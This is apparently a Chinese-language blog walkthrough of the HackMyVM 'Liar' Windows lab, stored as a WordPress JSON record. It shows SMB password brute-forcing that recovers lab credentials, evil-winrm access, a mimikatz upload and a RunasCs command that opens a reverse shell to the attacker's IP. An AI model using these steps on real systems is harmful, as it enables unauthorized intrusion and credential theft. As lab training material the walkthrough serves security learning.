{"id":558,"date":"2024-04-14T20:22:58","date_gmt":"2024-04-14T12:22:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=558"},"modified":"2024-04-14T20:22:58","modified_gmt":"2024-04-14T12:22:58","slug":"hmv-_-liar","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/558\/04\/14\/2024\/","title":{"rendered":"hmv[-_-]Liar"},"content":{"rendered":"

Liar<\/h1>\n

\"image-20240414183632268\"<\/div>
\n
\"image-20240414183729215\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 172.20.10.6 -- -A<\/code><\/pre>\n
Open 172.20.10.6:80\nOpen 172.20.10.6:135\nOpen 172.20.10.6:139\nOpen 172.20.10.6:445\nOpen 172.20.10.6:5985\nOpen 172.20.10.6:47001\nOpen 172.20.10.6:49664\nOpen 172.20.10.6:49665\nOpen 172.20.10.6:49666\nOpen 172.20.10.6:49667\nOpen 172.20.10.6:49668\nOpen 172.20.10.6:49669\n\nPORT      STATE SERVICE       REASON  VERSION\n80\/tcp    open  http          syn-ack Microsoft IIS httpd 10.0\n|_http-server-header: Microsoft-IIS\/10.0\n|_http-title: Site doesn't have a title (text\/html).\n| http-methods: \n|   Supported Methods: OPTIONS TRACE GET HEAD POST\n|_  Potentially risky methods: TRACE\n135\/tcp   open  msrpc         syn-ack Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds? syn-ack\n5985\/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n47001\/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n49664\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49665\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49666\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49667\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49668\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49669\/tcp open  msrpc         syn-ack Microsoft Windows RPC\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 0s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 14318\/tcp): CLEAN (Couldn't connect)\n|   Check 2 (port 37030\/tcp): CLEAN (Couldn't connect)\n|   Check 3 (port 33452\/udp): CLEAN (Timeout)\n|   Check 4 (port 54648\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:69:8c:98 (Oracle VirtualBox virtual NIC)\n| Names:\n|   WIN-IURF14RBVGV<20>  Flags: <unique><active>\n|   WIN-IURF14RBVGV<00>  Flags: <unique><active>\n|   WORKGROUP<00>        Flags: <group><active>\n| Statistics:\n|   08:00:27:69:8c:98:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-04-14T10:40:19\n|_  start_date: N\/A<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
gobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n
\u626b\u4e0d\u51fa\u6765\u5c31\u4e0d\u786c\u626b\u4e86\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\n
nikto -h http:\/\/172.20.10.6<\/code><\/pre>\n
- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.6\n+ Target Hostname:    172.20.10.6\n+ Target Port:        80\n+ Start Time:         2024-04-14 06:41:38 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/10.0\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-14 06:42:02 (GMT-4) (24 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
Hey bro, You asked for an easy Windows VM, enjoy it. - nica<\/code><\/pre>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
SMB<\/h4>\n
\u7206\u7834\u4e00\u4e0bsmb\u7aef\u53e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Liar]\n\u2514\u2500$ crackmapexec smb 172.20.10.6 -u nica -p \/usr\/share\/wordlists\/rockyou.txt\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:123456 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:12345 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:123456789 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:password STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:iloveyou STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:princess STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:1234567 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:rockyou STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:12345678 STATUS_LOGON_FAILURE \n.........................\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:crazy STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:valerie STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:spencer STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:scarface STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\\nica:hardcore<\/code><\/pre>\n
\u770b\u770b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Liar]\n\u2514\u2500$ smbmap -u nica -p hardcore -H 172.20.10.6\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/"       )|"  \\    \/"  ||   _  "\\ |"  \\    \/"  |     \/""\\       |   __ "\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/' \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __'  \\    (|  \/\n   \/" \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 172.20.10.6:445 Name: 172.20.10.6               Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Admin remota\n        C$                                                      NO ACCESS       Recurso predeterminado\n        IPC$                                                    READ ONLY       IPC remota<\/code><\/pre>\n
\u5c1d\u8bd5\u8bfb\u53d6\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Liar]\n\u2514\u2500$ smbclient -L \\\\\\\\172.20.10.6\\\\ -U nica \nPassword for [WORKGROUP\\nica]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Admin remota\n        C$              Disk      Recurso predeterminado\n        IPC$            IPC       IPC remota\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.6 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n
\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002<\/p>\n
5985<\/h4>\n
https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5985-5986-pentesting-winrm<\/a><\/p>\n
\"image-20240414190422227\"<\/div>
\n
\"image-20240414190527118\"<\/div><\/p>\n
\u8bf4\u660e\u8fd9\u662f\u4e00\u4e2a\u53ef\u4ee5\u8fdc\u7a0b\u8fde\u63a5\u7684\u7aef\u53e3\uff0c\u5c1d\u8bd5\u67e5\u627e\u4e00\u4e0b\u76f8\u5173\u7684\u4fe1\u606f\uff1a<\/p>\n
\"image-20240414190652720\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# gem install evil-winrm\n^CERROR:  Interrupted\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -h\nEvil-WinRM shell v3.5\nUsage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]\n    -S, --ssl                        Enable ssl\n    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate\n    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate\n    -r, --realm DOMAIN               Kerberos auth, it has to be set also in \/etc\/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }\n    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path\n        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)\n    -e, --executables EXES_PATH      C# executables local path\n    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)\n    -U, --url URL                    Remote url endpoint (default \/wsman)\n    -u, --user USER                  Username (required if not using kerberos)\n    -p, --password PASS              Password\n    -H, --hash HASH                  NTHash\n    -P, --port PORT                  Remote host port (default 5985)\n    -V, --version                    Show version\n    -n, --no-colors                  Disable colors\n    -N, --no-rpath-completion        Disable remote path completion\n    -l, --log                        Log the WinRM session\n    -h, --help                       Display this help message\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -u nica -p 'hardcore'  -i 172.20.10.6\nEvil-WinRM shell v3.5\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents> whoami\nwin-iurf14rbvgv\\nica\n\n*Evil-WinRM* PS C:\\Users\\nica\\Documents> ipconfig\nConfiguraci\u00a2n IP de Windows\n\nAdaptador de Ethernet Ethernet:\n\n   Sufijo DNS espec\u00a1fico para la conexi\u00a2n. . :\n   V\u00a1nculo: direcci\u00a2n IPv6 local. . . : fe80::c12a:b98d:e0bd:5030%5\n   Direcci\u00a2n IPv4. . . . . . . . . . . . . . : 172.20.10.6\n   M scara de subred . . . . . . . . . . . . : 255.255.255.240\n   Puerta de enlace predeterminada . . . . . : 172.20.10.1<\/code><\/pre>\n
\u63d0\u6743<\/h2>\n
\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
*Evil-WinRM* PS C:\\Users\\nica\\Documents> cd ..\/\n*Evil-WinRM* PS C:\\Users\\nica> dir\n\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        9\/26\/2023   6:44 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        9\/26\/2023   6:44 PM             10 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nica> type user.txt\nHMVWINGIFT\n*Evil-WinRM* PS C:\\Users\\nica> net user\n\nCuentas de usuario de \\\\\n\n-------------------------------------------------------------------------------\nAdministrador            akanksha                 DefaultAccount\nInvitado                 nica                     WDAGUtilityAccount\nEl comando se ha completado con uno o m s errores.\n\n*Evil-WinRM* PS C:\\Users\\nica> systeminfo\nsysteminfo.exe : Error: Acceso denegado\n    + CategoryInfo          : NotSpecified: (Error: Acceso denegado:String) [], RemoteException\n    + FullyQualifiedErrorId : NativeCommandError\n\n*Evil-WinRM* PS C:\\Users\\nica> whoami \/all\n\nINFORMACI\u00e0N DE USUARIO\n----------------------\n\nNombre de usuario    SID\n==================== ==============================================\nwin-iurf14rbvgv\\nica S-1-5-21-2519875556-2276787807-2868128514-1000\n\nINFORMACI\u00e0N DE GRUPO\n--------------------\n\nNombre de grupo                              Tipo           SID          Atributos\n============================================ ============== ============ ========================================================================\nTodos                                        Grupo conocido S-1-1-0      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nBUILTIN\\Usuarios                             Alias          S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nBUILTIN\\Usuarios de administraci\u00a2n remota    Alias          S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\NETWORK                         Grupo conocido S-1-5-2      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Usuarios autentificados         Grupo conocido S-1-5-11     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Esta compa\u00a4\u00a1a                   Grupo conocido S-1-5-15     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Cuenta local                    Grupo conocido S-1-5-113    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Autenticaci\u00a2n NTLM              Grupo conocido S-1-5-64-10  Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nEtiqueta obligatoria\\Nivel obligatorio medio Etiqueta       S-1-16-8192\n\nINFORMACI\u00e0N DE PRIVILEGIOS\n--------------------------\n\nNombre de privilegio          Descripci\u00a2n                                  Estado\n============================= ============================================ ==========\nSeChangeNotifyPrivilege       Omitir comprobaci\u00a2n de recorrido             Habilitada\nSeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada<\/code><\/pre>\n
\u67e5\u627e\u6f0f\u6d1e<\/h3>\n
\u67e5\u8be2\u4e00\u4e0b\u662f\u5426\u6709\u76f8\u5173\u6f0f\u6d1e\uff0c\u7136\u540e\u672c\u5730\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0bAdministrator<\/code>\u7528\u6237\uff1a<\/p>\n
\"image-20240414192148841\"<\/div><\/p>\n
\u4f46\u662f\u6211\u770b\u7684\u5f88\u61f5\u903c\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# crackmapexec smb 172.20.10.6 -u akanksha -p \/usr\/share\/wordlists\/rockyou.txt\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:123456 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:12345 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:123456789 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:password STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:iloveyou STATUS_LOGON_FAILURE \n...........\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:german STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:snowman STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:romero STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:madeline STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:dulce STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:turkey STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\\akanksha:sweetgirl<\/code><\/pre>\n
\u5f97\u5230\u7528\u6237\u540d\u548c\u5bc6\u7801\uff1a<\/p>\n
akanksha\nsweetgirl<\/code><\/pre>\n
\u5207\u6362\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240414192513631\"<\/div><\/p>\n
\u989d\u3002\u3002\u3002\u3002<\/p>\n
\u4e0a\u4f20mimikatz<\/h3>\n
\u5b9e\u5728\u4f1a\u7684\u4e0d\u591a\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u770b\u770b\u6709\u6ca1\u6709\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# cd \/usr\/share\/windows-resources\/mimikatz\/x64\n\n\u250c\u2500\u2500(root\u327fkali)-[\/usr\/share\/windows-resources\/mimikatz\/x64]\n\u2514\u2500# ls             \nmimidrv.sys  mimikatz.exe  mimilib.dll  mimispool.dll\n\n\u250c\u2500\u2500(root\u327fkali)-[\/usr\/share\/windows-resources\/mimikatz\/x64]\n\u2514\u2500# evil-winrm -u nica -p 'hardcore'  -i 172.20.10.6\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents> cd ..\n*Evil-WinRM* PS C:\\Users\\nica> upload mimikatz.exe\n\nInfo: Uploading \/usr\/share\/windows-resources\/mimikatz\/x64\/mimikatz.exe to C:\\Users\\nica\\mimikatz.exe\n\nData: 1807016 bytes of 1807016 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nica> ls\nc \n\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        4\/14\/2024   1:27 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        4\/14\/2024   1:32 PM        1335080 mimikatz.exe\n-a----        9\/26\/2023   6:44 PM             10 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nica> mimikatz.exe\nThe term 'mimikatz.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.\nAt line:1 char:1\n+ mimikatz.exe\n+ ~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (mimikatz.exe:String) [], CommandNotFoundException\n    + FullyQualifiedErrorId : CommandNotFoundException<\/code><\/pre>\n
\u592d\u6298\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u5229\u7528<\/h3>\n
\u641c\u4e00\u4e0b\u4e0a\u9762\u90a3\u4e2a\u7528\u6237\u672a\u7ecf\u8ba4\u8bc1\u65e0\u6cd5\u767b\u5f55\u7684\u62a5\u9519\uff1a<\/p>\n
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError<\/code><\/pre>\n
\u6ca1\u6709\u53d1\u73b0\u6709\u5229\u7528\u65b9\u6cd5\u7684\uff0c\u67e5\u770b\u5e08\u5085\u4eec\u7684wp\uff0c\u53d1\u73b0\u9700\u8981\u4f7f\u7528https:\/\/github.com\/antonioCoco\/RunasCs<\/code>\u8fd9\u4e00\u5de5\u5177\u6765\u89e3\u51b3\u51ed\u8bc1\u4e0d\u5339\u914d\u7684\u95ee\u9898\uff1a<\/p>\n
\n
RunasCs<\/em>\u662f\u4e00\u4e2a\u5b9e\u7528\u7a0b\u5e8f\uff0c\u7528\u4e8e\u4f7f\u7528\u4e0e\u7528\u6237\u5f53\u524d\u767b\u5f55\u4f7f\u7528\u663e\u5f0f\u51ed\u636e\u63d0\u4f9b\u7684\u6743\u9650\u4e0d\u540c\u7684\u6743\u9650\u6765\u8fd0\u884c\u7279\u5b9a\u8fdb\u7a0b\u3002\u8be5\u5de5\u5177\u662fWindows\u5185\u7f6erunas.exe<\/em>\u7684\u6539\u8fdb\u5f00\u653e\u7248\u672c\uff0c\u89e3\u51b3\u4e86\u4e00\u4e9b\u9650\u5236\uff1a<\/p>\n
    \n
  • \u5141\u8bb8\u663e\u5f0f\u51ed\u636e<\/li>\n
  • \u5982\u679c\u4ece\u4ea4\u4e92\u8fdb\u7a0b\u548c\u670d\u52a1\u8fdb\u7a0b\u4e2d\u751f\u6210\uff0c\u5219\u90fd\u53ef\u4ee5\u5de5\u4f5c<\/li>\n
  • \u6b63\u786e\u7ba1\u7406Window Station<\/em>\u548c*\u684c\u9762\u7684*DACL<\/em>\u4ee5\u521b\u5efa\u65b0\u8fdb\u7a0b<\/li>\n
  • \u4f7f\u7528\u66f4\u53ef\u9760\u7684\u521b\u5efa\u8fdb\u7a0b\u51fd\u6570\uff0c\u4f8b\u5982CreateProcessAsUser()<\/code>\u8c03\u7528CreateProcessWithTokenW()<\/code>\u8fdb\u7a0b\u662f\u5426\u62e5\u6709\u6240\u9700\u7684\u6743\u9650\uff08\u81ea\u52a8\u68c0\u6d4b\uff09<\/li>\n
  • \u5141\u8bb8\u6307\u5b9a\u767b\u5f55\u7c7b\u578b\uff0c\u4f8b\u5982 8-NetworkCleartext \u767b\u5f55\uff08\u65e0UAC<\/em>\u9650\u5236\uff09<\/li>\n
  • \u5141\u8bb8\u5728\u5df2\u77e5\u7ba1\u7406\u5458\u5bc6\u7801\u65f6\u7ed5\u8fc7 UAC\uff08\u6807\u5fd7 --bypass-uac\uff09<\/li>\n
  • \u5141\u8bb8\u521b\u5efa\u4e00\u4e2a\u8fdb\u7a0b\uff0c\u5176\u4e3b\u7ebf\u7a0b\u6a21\u62df\u8bf7\u6c42\u7684\u7528\u6237\uff08\u6807\u5fd7 --remote-impersonation\uff09<\/li>\n
  • \u5141\u8bb8\u5c06stdin<\/em>\u3001stdout<\/em>\u548cstderr<\/em>\u91cd\u5b9a\u5411\u5230\u8fdc\u7a0b\u4e3b\u673a<\/li>\n
  • \u5b83\u662f\u5f00\u6e90\u7684:)<\/li>\n<\/ul>\n<\/blockquote>\n
    \u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
    \u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# ls             \nRunasCs.zip\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# unzip RunasCs.zip      \nArchive:  RunasCs.zip\n  inflating: RunasCs.exe             \n  inflating: RunasCs_net2.exe        \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# ls\nRunasCs.exe  RunasCs_net2.exe  RunasCs.zip\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -u nica -p 'hardcore'  -i 172.20.10.6\n\nEvil-WinRM shell v3.5\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents> cd ..\n*Evil-WinRM* PS C:\\Users\\nica> ls\n\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        4\/14\/2024   1:27 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        4\/14\/2024   1:32 PM        1335080 mimikatz.exe\n-a----        9\/26\/2023   6:44 PM             10 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nica> upload RunasCs.exe\n\nInfo: Uploading \/home\/kali\/temp\/Liar\/RunasCs.exe to C:\\Users\\nica\\RunasCs.exe\n\nData: 68948 bytes of 68948 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nica> .\\RunasCs.exe akanksha sweetgirl cmd.exe -r 172.20.10.8:3456\n*Evil-WinRM* PS C:\\Users\\nica> ls\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        4\/14\/2024   1:27 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        4\/14\/2024   1:32 PM        1335080 mimikatz.exe\n-a----        9\/26\/2023   6:44 PM             10 user.txt<\/code><\/pre>\n
    \u5636\uff0c\u548b\u4e0d\u884c\u5462\uff0c\u6211\u770b\u522b\u4eba\u90fd\u53ef\u4ee5\u554a\uff0c\u5c1d\u8bd5\u91cd\u542f\u9776\u573a\u8bd5\u4e00\u4e0b\uff0c\u8fd8\u662f\u5f39\u4e0d\u56de\u6765\uff0c\u90aa\u95e8\uff0c\u8fd8\u4f1a\u88ab\u5220\u6389\uff1f<\/p>\n
    \u627e\u4e2a\u7248\u672c\u6bd4\u8f83\u65e9\u7684\u8bd5\u8bd5\uff1f\u8bd5\u8bd51.0<\/code>\u7248\u672c\u7684\u770b\u770b\u884c\u4e0d\u884c\uff0c\u5b9e\u6d4b\uff0c\u4e0d\u884c\uff0c\u63621.4<\/code>\u7248\u672c\u7684\uff1a<\/p>\n
